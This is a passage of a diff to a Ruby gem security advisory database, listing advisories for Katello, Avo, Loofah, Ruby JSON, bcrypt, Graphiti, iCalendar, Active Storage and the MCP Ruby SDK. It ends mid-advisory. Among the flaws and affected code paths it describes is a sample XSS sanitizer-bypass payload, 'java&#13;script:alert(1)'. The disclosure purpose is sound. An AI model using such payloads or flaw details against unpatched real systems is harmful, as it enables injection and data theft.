+    - https://about.gitlab.com/releases/2023/01/09/security-release-gitlab-15-7-2-released
+    - https://github.com/heartcombo/devise/pull/5784
+    - https://github.com/heartcombo/devise/issues/5783
+    - https://portswigger.net/research/smashing-the-state-machine
+    - https://groups.google.com/g/heartcombo/c/ieiLJhG4EGE/m/PNlIQv54AAAJ
+    - https://groups.google.com/g/heartcombo/c/o9mtkcfvt_g/m/SABX6rp8AgAJ
+    - https://groups.google.com/g/heartcombo/c/XDII89RV6Ak/m/AJMOyayNAgAJ
+    - https://groups.google.com/g/heartcombo/c/TWge7vKELhc/m/gRTrgKz4CQAJ
+    - https://github.com/heartcombo/devise/security/advisories/GHSA-57hq-95w6-v4fc
+---
diff --git a/advisories/_posts/2026-03-17-CVE-2026-4324.md b/advisories/_posts/2026-03-17-CVE-2026-4324.md
index c645e69e..9958e6d7 100644
--- a/advisories/_posts/2026-03-17-CVE-2026-4324.md
+++ b/advisories/_posts/2026-03-17-CVE-2026-4324.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2026-4324 (katello): Katello - Denial of Service and potential information
-  disclosure via SQL injection'''
-comments: false
-categories:
-- katello
-advisory:
-  gem: katello
-  cve: 2026-4324
-  ghsa: fwj4-6wgp-mpxm
-  url: https://access.redhat.com/security/cve/CVE-2026-4324
-  title: Katello - Denial of Service and potential information disclosure via SQL
-    injection'
-  date: 2026-03-17
-  description: |
-    A flaw was found in the Katello plugin for Red Hat Satellite. This
-    vulnerability, caused by improper sanitization of user-provided
-    input, allows a remote attacker to inject arbitrary SQL commands
-    into the sort_by parameter of the /api/hosts/bootc_images API
-    endpoint. This can lead to a Denial of Service (DoS) by triggering
-    database errors, and potentially enable Boolean-based Blind SQL
-    injection, which could allow an attacker to extract sensitive
-    information from the database.
-  cvss_v3: 5.4
-  patched_versions:
-  - ">= 4.19.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-4324
-    - https://access.redhat.com/security/cve/CVE-2026-4324
-    - https://bugzilla.redhat.com/show_bug.cgi?id=2448349
-    - https://github.com/Katello/katello/commit/a0a793b08d4f0a897ee985d79a687ad043f99e57
-    - https://github.com/advisories/GHSA-fwj4-6wgp-mpxm
----
+---
+layout: advisory
+title: 'CVE-2026-4324 (katello): Katello - Denial of Service and potential information
+  disclosure via SQL injection'''
+comments: false
+categories:
+- katello
+advisory:
+  gem: katello
+  cve: 2026-4324
+  ghsa: fwj4-6wgp-mpxm
+  url: https://access.redhat.com/security/cve/CVE-2026-4324
+  title: Katello - Denial of Service and potential information disclosure via SQL
+    injection'
+  date: 2026-03-17
+  description: |
+    A flaw was found in the Katello plugin for Red Hat Satellite. This
+    vulnerability, caused by improper sanitization of user-provided
+    input, allows a remote attacker to inject arbitrary SQL commands
+    into the sort_by parameter of the /api/hosts/bootc_images API
+    endpoint. This can lead to a Denial of Service (DoS) by triggering
+    database errors, and potentially enable Boolean-based Blind SQL
+    injection, which could allow an attacker to extract sensitive
+    information from the database.
+  cvss_v3: 5.4
+  patched_versions:
+  - ">= 4.19.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-4324
+    - https://access.redhat.com/security/cve/CVE-2026-4324
+    - https://bugzilla.redhat.com/show_bug.cgi?id=2448349
+    - https://github.com/Katello/katello/commit/a0a793b08d4f0a897ee985d79a687ad043f99e57
+    - https://github.com/advisories/GHSA-fwj4-6wgp-mpxm
+---
diff --git a/advisories/_posts/2026-03-18-CVE-2026-33209.md b/advisories/_posts/2026-03-18-CVE-2026-33209.md
index d6cc459d..995be623 100644
--- a/advisories/_posts/2026-03-18-CVE-2026-33209.md
+++ b/advisories/_posts/2026-03-18-CVE-2026-33209.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2026-33209 (avo): Avo has a XSS vulnerability on `return_to` param'
-comments: false
-categories:
-- avo
-advisory:
-  gem: avo
-  cve: 2026-33209
-  ghsa: 762r-27w2-q22j
-  url: https://github.com/avo-hq/avo/security/advisories/GHSA-762r-27w2-q22j
-  title: Avo has a XSS vulnerability on `return_to` param
-  date: 2026-03-18
-  description: |
-    ## Description
-
-    A reflected cross-site scripting (XSS) vulnerability exists in
-    the `return_to` query parameter used in the avo interface.
-
-    An attacker can craft a malicious URL that injects arbitrary
-    JavaScript, which is executed when he clicks a dynamically
-    generated navigation button.
-
-    ## Impact
-
-    This vulnerability may allow execution of arbitrary JavaScript
-    in the context of the application.
-
-    Impact varies depending on deployment:
-    - In unauthenticated setups: exploitable via crafted links sent to users.
-    - In authenticated setups: limited to authenticated users and
-      requires interaction.
-  cvss_v4: 5.3
-  patched_versions:
-  - ">= 3.30.3"
-  related:
-    url:
-    - https://github.com/avo-hq/avo/security/advisories/GHSA-762r-27w2-q22j
-    - https://github.com/advisories/GHSA-762r-27w2-q22j
----
+---
+layout: advisory
+title: 'CVE-2026-33209 (avo): Avo has a XSS vulnerability on `return_to` param'
+comments: false
+categories:
+- avo
+advisory:
+  gem: avo
+  cve: 2026-33209
+  ghsa: 762r-27w2-q22j
+  url: https://github.com/avo-hq/avo/security/advisories/GHSA-762r-27w2-q22j
+  title: Avo has a XSS vulnerability on `return_to` param
+  date: 2026-03-18
+  description: |
+    ## Description
+
+    A reflected cross-site scripting (XSS) vulnerability exists in
+    the `return_to` query parameter used in the avo interface.
+
+    An attacker can craft a malicious URL that injects arbitrary
+    JavaScript, which is executed when he clicks a dynamically
+    generated navigation button.
+
+    ## Impact
+
+    This vulnerability may allow execution of arbitrary JavaScript
+    in the context of the application.
+
+    Impact varies depending on deployment:
+    - In unauthenticated setups: exploitable via crafted links sent to users.
+    - In authenticated setups: limited to authenticated users and
+      requires interaction.
+  cvss_v4: 5.3
+  patched_versions:
+  - ">= 3.30.3"
+  related:
+    url:
+    - https://github.com/avo-hq/avo/security/advisories/GHSA-762r-27w2-q22j
+    - https://github.com/advisories/GHSA-762r-27w2-q22j
+---
diff --git a/advisories/_posts/2026-03-18-GHSA-46fp-8f5p-pf2m.md b/advisories/_posts/2026-03-18-GHSA-46fp-8f5p-pf2m.md
index c536403f..59ad5b54 100644
--- a/advisories/_posts/2026-03-18-GHSA-46fp-8f5p-pf2m.md
+++ b/advisories/_posts/2026-03-18-GHSA-46fp-8f5p-pf2m.md
@@ -1,62 +1,62 @@
----
-layout: advisory
-title: 'GHSA-46fp-8f5p-pf2m (loofah): Improper detection of disallowed URIs by Loofah
-  `allowed_uri?`'
-comments: false
-categories:
-- loofah
-advisory:
-  gem: loofah
-  ghsa: 46fp-8f5p-pf2m
-  url: https://github.com/flavorjones/loofah/security/advisories/GHSA-46fp-8f5p-pf2m
-  title: Improper detection of disallowed URIs by Loofah `allowed_uri?`
-  date: 2026-03-18
-  description: |
-    ## Summary
-
-    `Loofah::HTML5::Scrub.allowed_uri?` does not correctly reject
-    `javascript:` URIs when the scheme is split by HTML entity-encoded
-    control characters such as `&#13;` (carriage return), `&#10;`
-    (line feed), or `&#9;` (tab).
-
-    ## Details
-
-    The `allowed_uri?` method strips literal control characters before
-    decoding HTML entities. Payloads like `java&#13;script:alert(1)`
-    survive the control character strip, then `&#13;` is decoded to
-    a carriage return, producing `java\rscript:alert(1)`.
-
-    Note that the Loofah sanitizer's default `sanitize()` path is
-    **not affected** because Nokogiri decodes HTML entities during
-    parsing before Loofah evaluates the URI protocol. This issue only
-    affects direct callers of the `allowed_uri?` string-level helper
-    when passing HTML-encoded strings.
-
-    ## Impact
-
-    Applications that call `Loofah::HTML5::Scrub.allowed_uri?` to
-    validate user-controlled URLs and then render approved URLs into
-    `href` or other browser-interpreted URI attributes may be
-    vulnerable to cross-site scripting (XSS).
-
-    This only affects Loofah `2.25.0`.
-
-    ## Mitigation
-
-    Upgrade to Loofah >= `2.25.1`.
-
-    ## Credit
-
-    Responsibly reported by HackOne user `@smlee`.
-  unaffected_versions:
-  - "< 2.25.0"
-  patched_versions:
-  - ">= 2.25.1"
-  related:
-    url:
-    - https://github.com/flavorjones/loofah/security/advisories/GHSA-46fp-8f5p-pf2m
-    - https://github.com/flavorjones/loofah/releases/tag/v2.25.1
-    - https://github.com/flavorjones/loofah/commit/f4ebc9c5193dde759a57541062e490e86fc7c068
-    - https://github.com/advisories/GHSA-2j22-pr5w-6gq8
-    - https://github.com/advisories/GHSA-46fp-8f5p-pf2m
----
+---
+layout: advisory
+title: 'GHSA-46fp-8f5p-pf2m (loofah): Improper detection of disallowed URIs by Loofah
+  `allowed_uri?`'
+comments: false
+categories:
+- loofah
+advisory:
+  gem: loofah
+  ghsa: 46fp-8f5p-pf2m
+  url: https://github.com/flavorjones/loofah/security/advisories/GHSA-46fp-8f5p-pf2m
+  title: Improper detection of disallowed URIs by Loofah `allowed_uri?`
+  date: 2026-03-18
+  description: |
+    ## Summary
+
+    `Loofah::HTML5::Scrub.allowed_uri?` does not correctly reject
+    `javascript:` URIs when the scheme is split by HTML entity-encoded
+    control characters such as `&#13;` (carriage return), `&#10;`
+    (line feed), or `&#9;` (tab).
+
+    ## Details
+
+    The `allowed_uri?` method strips literal control characters before
+    decoding HTML entities. Payloads like `java&#13;script:alert(1)`
+    survive the control character strip, then `&#13;` is decoded to
+    a carriage return, producing `java\rscript:alert(1)`.
+
+    Note that the Loofah sanitizer's default `sanitize()` path is
+    **not affected** because Nokogiri decodes HTML entities during
+    parsing before Loofah evaluates the URI protocol. This issue only
+    affects direct callers of the `allowed_uri?` string-level helper
+    when passing HTML-encoded strings.
+
+    ## Impact
+
+    Applications that call `Loofah::HTML5::Scrub.allowed_uri?` to
+    validate user-controlled URLs and then render approved URLs into
+    `href` or other browser-interpreted URI attributes may be
+    vulnerable to cross-site scripting (XSS).
+
+    This only affects Loofah `2.25.0`.
+
+    ## Mitigation
+
+    Upgrade to Loofah >= `2.25.1`.
+
+    ## Credit
+
+    Responsibly reported by HackOne user `@smlee`.
+  unaffected_versions:
+  - "< 2.25.0"
+  patched_versions:
+  - ">= 2.25.1"
+  related:
+    url:
+    - https://github.com/flavorjones/loofah/security/advisories/GHSA-46fp-8f5p-pf2m
+    - https://github.com/flavorjones/loofah/releases/tag/v2.25.1
+    - https://github.com/flavorjones/loofah/commit/f4ebc9c5193dde759a57541062e490e86fc7c068
+    - https://github.com/advisories/GHSA-2j22-pr5w-6gq8
+    - https://github.com/advisories/GHSA-46fp-8f5p-pf2m
+---
diff --git a/advisories/_posts/2026-03-19-CVE-2026-33210.md b/advisories/_posts/2026-03-19-CVE-2026-33210.md
index 43bb6465..8e3a55f1 100644
--- a/advisories/_posts/2026-03-19-CVE-2026-33210.md
+++ b/advisories/_posts/2026-03-19-CVE-2026-33210.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2026-33210 (json): Ruby JSON has a format string injection vulnerability'
-comments: false
-categories:
-- json
-advisory:
-  gem: json
-  cve: 2026-33210
-  ghsa: 3m6g-2423-7cp3
-  url: https://github.com/ruby/json/security/advisories/GHSA-3m6g-2423-7cp3
-  title: Ruby JSON has a format string injection vulnerability
-  date: 2026-03-19
-  description: |
-    ### Impact
-
-    A format string injection vulnerability than that lead to denial of
-    service attacks or information disclosure, when the `allow_duplicate_key:
-    false` parsing option is used to parse user supplied documents.
-
-    This option isn't the default, if you didn't opt-in to use it,
-    you are not impacted.
-
-    ### Patches
-
-    Patched in `2.19.2`.
-
-    ### Workarounds
-
-    The issue can be avoided by not using the `allow_duplicate_key: false`
-    parsing option.
-  unaffected_versions:
-  - "< 2.14.0"
-  patched_versions:
-  - "~> 2.15.2.1"
-  - "~> 2.17.1.2"
-  - ">= 2.19.2"
-  related:
-    url:
-    - https://github.com/ruby/json/security/advisories/GHSA-3m6g-2423-7cp3
-    - https://github.com/advisories/GHSA-3m6g-2423-7cp3
----
+---
+layout: advisory
+title: 'CVE-2026-33210 (json): Ruby JSON has a format string injection vulnerability'
+comments: false
+categories:
+- json
+advisory:
+  gem: json
+  cve: 2026-33210
+  ghsa: 3m6g-2423-7cp3
+  url: https://github.com/ruby/json/security/advisories/GHSA-3m6g-2423-7cp3
+  title: Ruby JSON has a format string injection vulnerability
+  date: 2026-03-19
+  description: |
+    ### Impact
+
+    A format string injection vulnerability than that lead to denial of
+    service attacks or information disclosure, when the `allow_duplicate_key:
+    false` parsing option is used to parse user supplied documents.
+
+    This option isn't the default, if you didn't opt-in to use it,
+    you are not impacted.
+
+    ### Patches
+
+    Patched in `2.19.2`.
+
+    ### Workarounds
+
+    The issue can be avoided by not using the `allow_duplicate_key: false`
+    parsing option.
+  unaffected_versions:
+  - "< 2.14.0"
+  patched_versions:
+  - "~> 2.15.2.1"
+  - "~> 2.17.1.2"
+  - ">= 2.19.2"
+  related:
+    url:
+    - https://github.com/ruby/json/security/advisories/GHSA-3m6g-2423-7cp3
+    - https://github.com/advisories/GHSA-3m6g-2423-7cp3
+---
diff --git a/advisories/_posts/2026-03-19-CVE-2026-33306.md b/advisories/_posts/2026-03-19-CVE-2026-33306.md
index 9bca66b9..a46a117c 100644
--- a/advisories/_posts/2026-03-19-CVE-2026-33306.md
+++ b/advisories/_posts/2026-03-19-CVE-2026-33306.md
@@ -1,51 +1,51 @@
----
-layout: advisory
-title: 'CVE-2026-33306 (bcrypt): bcrypt-ruby has an Integer Overflow that Causes Zero
-  Key-Strengthening Iterations at Cost=31 on JRuby'
-comments: false
-categories:
-- bcrypt
-advisory:
-  gem: bcrypt
-  cve: 2026-33306
-  ghsa: f27w-vcwj-c954
-  url: https://github.com/advisories/GHSA-f27w-vcwj-c954
-  title: bcrypt-ruby has an Integer Overflow that Causes Zero Key-Strengthening Iterations
-    at Cost=31 on JRuby
-  date: 2026-03-19
-  description: |
-    ### Impact
-
-    An integer overflow in the Java BCrypt implementation for JRuby can
-    cause zero iterations in the strengthening loop.  Impacted
-    applications must be setting the cost to 31 to see this happen.
-
-    The JRuby implementation of bcrypt-ruby (`BCrypt.java`) computes
-    the key-strengthening round count as a signed 32-bit integer.
-    When `cost=31` (the maximum allowed by the gem), signed integer
-    overflow causes the round count to become negative, and the
-    strengthening loop executes **zero iterations**. This collapses
-    bcrypt from 2^31 rounds of exponential key-strengthening to
-    effectively constant-time computation — only the initial
-    EksBlowfish key setup and final 64x encryption phase remain.
-
-    The resulting hash looks valid (`$2a$31$...`) and verifies
-    correctly via `checkpw`, making the weakness invisible to the
-    application. This issue is triggered only when cost=31 is
-    used or when verifying a `$2a$31$` hash.
-
-    ### Patches
-
-    This problem has been fixed in version 3.1.22
-
-    ### Workarounds
-
-    Set the cost to something less than 31.
-  patched_versions:
-  - ">= 3.1.22"
-  related:
-    url:
-    - https://github.com/bcrypt-ruby/bcrypt-ruby/security/advisories/GHSA-f27w-vcwj-c954
-    - https://github.com/bcrypt-ruby/bcrypt-ruby/commit/5faa2748331d3edc661c127ef2fbb3afcb6b02a4
-    - https://github.com/advisories/GHSA-f27w-vcwj-c954
----
+---
+layout: advisory
+title: 'CVE-2026-33306 (bcrypt): bcrypt-ruby has an Integer Overflow that Causes Zero
+  Key-Strengthening Iterations at Cost=31 on JRuby'
+comments: false
+categories:
+- bcrypt
+advisory:
+  gem: bcrypt
+  cve: 2026-33306
+  ghsa: f27w-vcwj-c954
+  url: https://github.com/advisories/GHSA-f27w-vcwj-c954
+  title: bcrypt-ruby has an Integer Overflow that Causes Zero Key-Strengthening Iterations
+    at Cost=31 on JRuby
+  date: 2026-03-19
+  description: |
+    ### Impact
+
+    An integer overflow in the Java BCrypt implementation for JRuby can
+    cause zero iterations in the strengthening loop.  Impacted
+    applications must be setting the cost to 31 to see this happen.
+
+    The JRuby implementation of bcrypt-ruby (`BCrypt.java`) computes
+    the key-strengthening round count as a signed 32-bit integer.
+    When `cost=31` (the maximum allowed by the gem), signed integer
+    overflow causes the round count to become negative, and the
+    strengthening loop executes **zero iterations**. This collapses
+    bcrypt from 2^31 rounds of exponential key-strengthening to
+    effectively constant-time computation — only the initial
+    EksBlowfish key setup and final 64x encryption phase remain.
+
+    The resulting hash looks valid (`$2a$31$...`) and verifies
+    correctly via `checkpw`, making the weakness invisible to the
+    application. This issue is triggered only when cost=31 is
+    used or when verifying a `$2a$31$` hash.
+
+    ### Patches
+
+    This problem has been fixed in version 3.1.22
+
+    ### Workarounds
+
+    Set the cost to something less than 31.
+  patched_versions:
+  - ">= 3.1.22"
+  related:
+    url:
+    - https://github.com/bcrypt-ruby/bcrypt-ruby/security/advisories/GHSA-f27w-vcwj-c954
+    - https://github.com/bcrypt-ruby/bcrypt-ruby/commit/5faa2748331d3edc661c127ef2fbb3afcb6b02a4
+    - https://github.com/advisories/GHSA-f27w-vcwj-c954
+---
diff --git a/advisories/_posts/2026-03-20-CVE-2026-33286.md b/advisories/_posts/2026-03-20-CVE-2026-33286.md
index 106cde59..7e1da2eb 100644
--- a/advisories/_posts/2026-03-20-CVE-2026-33286.md
+++ b/advisories/_posts/2026-03-20-CVE-2026-33286.md
@@ -1,61 +1,61 @@
----
-layout: advisory
-title: 'CVE-2026-33286 (graphiti): Graphiti Affected by Arbitrary Method Execution
-  via Unvalidated Relationship Names'
-comments: false
-categories:
-- graphiti
-advisory:
-  gem: graphiti
-  cve: 2026-33286
-  ghsa: 3m5v-4xp5-gjg2
-  url: https://github.com/graphiti-api/graphiti/security/advisories/GHSA-3m5v-4xp5-gjg2
-  title: Graphiti Affected by Arbitrary Method Execution via Unvalidated Relationship
-    Names
-  date: 2026-03-20
-  description: |
-    ### Summary
-
-    An arbitrary method execution vulnerability has been found which
-    affects Graphiti's JSONAPI write functionality. An attacker can
-    craft a malicious JSONAPI payload with arbitrary relationship
-    names to invoke any public method on the underlying model
-    instance, class or its associations.
-
-    ### Impact
-
-    Any application exposing Graphiti write endpoints (create/update/delete)
-    to untrusted users is affected.
-
-    The `Graphiti::Util::ValidationResponse#all_valid?` method recursively
-    calls `model.send(name)` using relationship names taken directly from
-    user-supplied JSONAPI payloads, without validating them against the
-    resource's configured sideloads. This allows an attacker to potentially
-    run any public method on a given model instance, on the instance class
-    or associated instances or classes, including destructive operations.
-
-    ### Patches
-
-    This is patched in Graphiti **v1.10.2**.
-    Users should upgrade as soon as possible.
-
-    ### Workarounds
-
-    If upgrading to v1.10.2 is not immediately possible, consider one
-    or more of the following mitigations:
-
-    - **Restrict write access**: Ensure Graphiti write endpoints
-      (create/update/delete) are not accessible to untrusted users.
-    - **Authentication & authorisation**: Apply strong authentication
-      and authorisation checks before any write operation is processed,
-      for example use Rails strong parameters to ensure only valid
-      parameters are processed."
-  cvss_v3: 9.1
-  patched_versions:
-  - ">= 1.10.2"
-  related:
-    url:
-    - https://github.com/graphiti-api/graphiti/security/advisories/GHSA-3m5v-4xp5-gjg2
-    - https://gitlab.com/gitlab-org/security-products/gemnasium-db/-/blob/master/gem/graphiti/CVE-2026-33286.yml
-    - https://github.com/advisories/GHSA-3m5v-4xp5-gjg2
----
+---
+layout: advisory
+title: 'CVE-2026-33286 (graphiti): Graphiti Affected by Arbitrary Method Execution
+  via Unvalidated Relationship Names'
+comments: false
+categories:
+- graphiti
+advisory:
+  gem: graphiti
+  cve: 2026-33286
+  ghsa: 3m5v-4xp5-gjg2
+  url: https://github.com/graphiti-api/graphiti/security/advisories/GHSA-3m5v-4xp5-gjg2
+  title: Graphiti Affected by Arbitrary Method Execution via Unvalidated Relationship
+    Names
+  date: 2026-03-20
+  description: |
+    ### Summary
+
+    An arbitrary method execution vulnerability has been found which
+    affects Graphiti's JSONAPI write functionality. An attacker can
+    craft a malicious JSONAPI payload with arbitrary relationship
+    names to invoke any public method on the underlying model
+    instance, class or its associations.
+
+    ### Impact
+
+    Any application exposing Graphiti write endpoints (create/update/delete)
+    to untrusted users is affected.
+
+    The `Graphiti::Util::ValidationResponse#all_valid?` method recursively
+    calls `model.send(name)` using relationship names taken directly from
+    user-supplied JSONAPI payloads, without validating them against the
+    resource's configured sideloads. This allows an attacker to potentially
+    run any public method on a given model instance, on the instance class
+    or associated instances or classes, including destructive operations.
+
+    ### Patches
+
+    This is patched in Graphiti **v1.10.2**.
+    Users should upgrade as soon as possible.
+
+    ### Workarounds
+
+    If upgrading to v1.10.2 is not immediately possible, consider one
+    or more of the following mitigations:
+
+    - **Restrict write access**: Ensure Graphiti write endpoints
+      (create/update/delete) are not accessible to untrusted users.
+    - **Authentication & authorisation**: Apply strong authentication
+      and authorisation checks before any write operation is processed,
+      for example use Rails strong parameters to ensure only valid
+      parameters are processed."
+  cvss_v3: 9.1
+  patched_versions:
+  - ">= 1.10.2"
+  related:
+    url:
+    - https://github.com/graphiti-api/graphiti/security/advisories/GHSA-3m5v-4xp5-gjg2
+    - https://gitlab.com/gitlab-org/security-products/gemnasium-db/-/blob/master/gem/graphiti/CVE-2026-33286.yml
+    - https://github.com/advisories/GHSA-3m5v-4xp5-gjg2
+---
diff --git a/advisories/_posts/2026-03-24-CVE-2026-33635.md b/advisories/_posts/2026-03-24-CVE-2026-33635.md
index 663f3e86..90448dee 100644
--- a/advisories/_posts/2026-03-24-CVE-2026-33635.md
+++ b/advisories/_posts/2026-03-24-CVE-2026-33635.md
@@ -1,59 +1,59 @@
----
-layout: advisory
-title: 'CVE-2026-33635 (icalendar): iCalendar has ICS injection via unsanitized URI
-  property values'
-comments: false
-categories:
-- icalendar
-advisory:
-  gem: icalendar
-  cve: 2026-33635
-  ghsa: pv9c-9mfh-hvxq
-  url: https://github.com/icalendar/icalendar/security/advisories/GHSA-pv9c-9mfh-hvxq
-  title: iCalendar has ICS injection via unsanitized URI property values
-  date: 2026-03-24
-  description: |
-    ### Summary
-
-    .ics serialization does not properly sanitize URI property values,
-    enabling ICS injection through attacker-controlled input, adding
-    arbitrary calendar lines to the output.
-
-    ### Details
-
-    `Icalendar::Values::Uri` falls back to the raw input string when
-    `URI.parse` fails and later serializes it with `value.to_s` without
-    removing or escaping `\r` or `\n` characters. That value is embedded
-    directly into the final ICS line by the normal serializer, so a
-    payload containing CRLF can terminate the original property and
-    create a new ICS property or component. (It looks like you can
-    inject via url, source, image, organizer, attach, attendee,
-    conference, tzurl because of this)
-
-    Relevant code:
-    - `lib/icalendar/values/uri.rb:16`
-
-    ### Impact
-
-    Applications that generate `.ics` files from partially untrusted
-    metadata are impacted. As a result, downstream calendar clients
-    or importers may process attacker-supplied content as if it were
-    legitimate event data, such as added attendees, modified URLs,
-    alarms, or other calendar fields.
-
-    ## Fix
-
-    Reject raw CR and LF characters in `URI`-typed values before
-    serialization, or escape/encode them so they cannot terminate
-    the current ICS content line.
-  cvss_v3: 4.3
-  unaffected_versions:
-  - "< 2.0.0"
-  patched_versions:
-  - ">= 2.12.2"
-  related:
-    url:
-    - https://github.com/icalendar/icalendar/security/advisories/GHSA-pv9c-9mfh-hvxq
-    - https://github.com/icalendar/icalendar/commit/b8d23b490363ee5fffaec1d269a8618a912ca265
-    - https://github.com/advisories/GHSA-pv9c-9mfh-hvxq
----
+---
+layout: advisory
+title: 'CVE-2026-33635 (icalendar): iCalendar has ICS injection via unsanitized URI
+  property values'
+comments: false
+categories:
+- icalendar
+advisory:
+  gem: icalendar
+  cve: 2026-33635
+  ghsa: pv9c-9mfh-hvxq
+  url: https://github.com/icalendar/icalendar/security/advisories/GHSA-pv9c-9mfh-hvxq
+  title: iCalendar has ICS injection via unsanitized URI property values
+  date: 2026-03-24
+  description: |
+    ### Summary
+
+    .ics serialization does not properly sanitize URI property values,
+    enabling ICS injection through attacker-controlled input, adding
+    arbitrary calendar lines to the output.
+
+    ### Details
+
+    `Icalendar::Values::Uri` falls back to the raw input string when
+    `URI.parse` fails and later serializes it with `value.to_s` without
+    removing or escaping `\r` or `\n` characters. That value is embedded
+    directly into the final ICS line by the normal serializer, so a
+    payload containing CRLF can terminate the original property and
+    create a new ICS property or component. (It looks like you can
+    inject via url, source, image, organizer, attach, attendee,
+    conference, tzurl because of this)
+
+    Relevant code:
+    - `lib/icalendar/values/uri.rb:16`
+
+    ### Impact
+
+    Applications that generate `.ics` files from partially untrusted
+    metadata are impacted. As a result, downstream calendar clients
+    or importers may process attacker-supplied content as if it were
+    legitimate event data, such as added attendees, modified URLs,
+    alarms, or other calendar fields.
+
+    ## Fix
+
+    Reject raw CR and LF characters in `URI`-typed values before
+    serialization, or escape/encode them so they cannot terminate
+    the current ICS content line.
+  cvss_v3: 4.3
+  unaffected_versions:
+  - "< 2.0.0"
+  patched_versions:
+  - ">= 2.12.2"
+  related:
+    url:
+    - https://github.com/icalendar/icalendar/security/advisories/GHSA-pv9c-9mfh-hvxq
+    - https://github.com/icalendar/icalendar/commit/b8d23b490363ee5fffaec1d269a8618a912ca265
+    - https://github.com/advisories/GHSA-pv9c-9mfh-hvxq
+---
diff --git a/advisories/_posts/2026-03-25-CVE-2026-33658.md b/advisories/_posts/2026-03-25-CVE-2026-33658.md
index 302d07f4..0162610c 100644
--- a/advisories/_posts/2026-03-25-CVE-2026-33658.md
+++ b/advisories/_posts/2026-03-25-CVE-2026-33658.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2026-33658 (activestorage): Rails Active Storage has a possible DoS vulnerability
-  in proxy mode via multi-range requests'
-comments: false
-categories:
-- activestorage
-- rails
-advisory:
-  gem: activestorage
-  framework: rails
-  cve: 2026-33658
-  ghsa: p9fm-f462-ggrg
-  url: https://github.com/rails/rails/security/advisories/GHSA-p9fm-f462-ggrg
-  title: Rails Active Storage has a possible DoS vulnerability in proxy mode via multi-range
-    requests
-  date: 2026-03-25
-  description: |
-    ## Impact
-
-    Active Storage’s proxy controller does not limit the number of byte
-    ranges in an HTTP Range header. A request with thousands of small
-    ranges causes disproportionate CPU usage compared to a normal
-    request for the same file, possibly resulting in a DoS vulnerability.
-  patched_versions:
-  - "~> 7.2.3, >= 7.2.3.1"
-  - "~> 8.0.4, >= 8.0.4.1"
-  - ">= 8.1.2.1"
-  related:
-    url:
-    - https://discuss.rubyonrails.org/t/cve-2026-33658-possible-dos-vulnerability-in-active-storage-proxy-mode-via-multi-range-requests/90906
-    - https://rubyonrails.org/2026/3/23/Rails-Versions-7-2-3-1-8-0-4-1-and-8-1-2-1-have-been-released
-    - https://github.com/rails/rails/commit/85ec5b1e00d3197d8c69a5e622e1b398a1b10b06.patch
-    - https://github.com/rails/rails/commit/d7da4ef03f99035fba5add8828646f1e9173549c.patch
-    - https://github.com/rails/rails/commit/b8a1665824a43d71cd6406cf9adcae842ceb1c22.patch
-    - https://github.com/rails/rails/security/advisories/GHSA-p9fm-f462-ggrg
-    - https://github.com/advisories/GHSA-p9fm-f462-ggrg
----
+---
+layout: advisory
+title: 'CVE-2026-33658 (activestorage): Rails Active Storage has a possible DoS vulnerability
+  in proxy mode via multi-range requests'
+comments: false
+categories:
+- activestorage
+- rails
+advisory:
+  gem: activestorage
+  framework: rails
+  cve: 2026-33658
+  ghsa: p9fm-f462-ggrg
+  url: https://github.com/rails/rails/security/advisories/GHSA-p9fm-f462-ggrg
+  title: Rails Active Storage has a possible DoS vulnerability in proxy mode via multi-range
+    requests
+  date: 2026-03-25
+  description: |
+    ## Impact
+
+    Active Storage’s proxy controller does not limit the number of byte
+    ranges in an HTTP Range header. A request with thousands of small
+    ranges causes disproportionate CPU usage compared to a normal
+    request for the same file, possibly resulting in a DoS vulnerability.
+  patched_versions:
+  - "~> 7.2.3, >= 7.2.3.1"
+  - "~> 8.0.4, >= 8.0.4.1"
+  - ">= 8.1.2.1"
+  related:
+    url:
+    - https://discuss.rubyonrails.org/t/cve-2026-33658-possible-dos-vulnerability-in-active-storage-proxy-mode-via-multi-range-requests/90906
+    - https://rubyonrails.org/2026/3/23/Rails-Versions-7-2-3-1-8-0-4-1-and-8-1-2-1-have-been-released
+    - https://github.com/rails/rails/commit/85ec5b1e00d3197d8c69a5e622e1b398a1b10b06.patch
+    - https://github.com/rails/rails/commit/d7da4ef03f99035fba5add8828646f1e9173549c.patch
+    - https://github.com/rails/rails/commit/b8a1665824a43d71cd6406cf9adcae842ceb1c22.patch
+    - https://github.com/rails/rails/security/advisories/GHSA-p9fm-f462-ggrg
+    - https://github.com/advisories/GHSA-p9fm-f462-ggrg
+---
diff --git a/advisories/_posts/2026-03-27-CVE-2026-33946.md b/advisories/_posts/2026-03-27-CVE-2026-33946.md
index 1d241780..cdf02ced 100644
--- a/advisories/_posts/2026-03-27-CVE-2026-33946.md
+++ b/advisories/_posts/2026-03-27-CVE-2026-33946.md
@@ -1,61 +1,61 @@
----
-layout: advisory
-title: 'CVE-2026-33946 (mcp): MCP Ruby SDK - Insufficient Session Binding Allows SSE
-  Stream Hijacking via Session ID Replay'
-comments: false
-categories:
-- mcp
-advisory:
-  gem: mcp
-  cve: 2026-33946
-  ghsa: qvqr-5cv7-wh35
-  url: https://github.com/modelcontextprotocol/ruby-sdk/security/advisories/GHSA-qvqr-5cv7-wh35
-  title: MCP Ruby SDK - Insufficient Session Binding Allows SSE Stream Hijacking via
-    Session ID Replay
-  date: 2026-03-27
-  description: |
-    ### Summary
-
-    The Ruby SDK's [streamable_http_transport.rb](https://github.com/modelcontextprotocol/ruby-sdk/blob/main/lib/mcp/server/transports/streamable_http_transport.rb)
-    implementation contains a session hijacking vulnerability. An attacker
-    who obtains a valid session ID can completely hijack the victim's
-    Server-Sent Events (SSE) stream and intercept all real-time data.
-
-    ### Details
-
-    **Root Cause**
-
-    The StreamableHTTPTransport implementation stores only one SSE stream
-    object per session ID and lacks:
-
-    - Session-to-user identity binding
-    - Ownership validation when establishing SSE connections
-    - Protection against multiple simultaneous connections to the same session
-
-    ### Impact
-
-    While the absence of user binding may not pose immediate risks if
-    session IDs are not used to store sensitive data or state, the
-    fundamental purpose of session IDs is to maintain stateful connections.
-    If the SDK or its consumers utilize session IDs for sensitive operations
-    without proper user binding controls, this creates a potential security
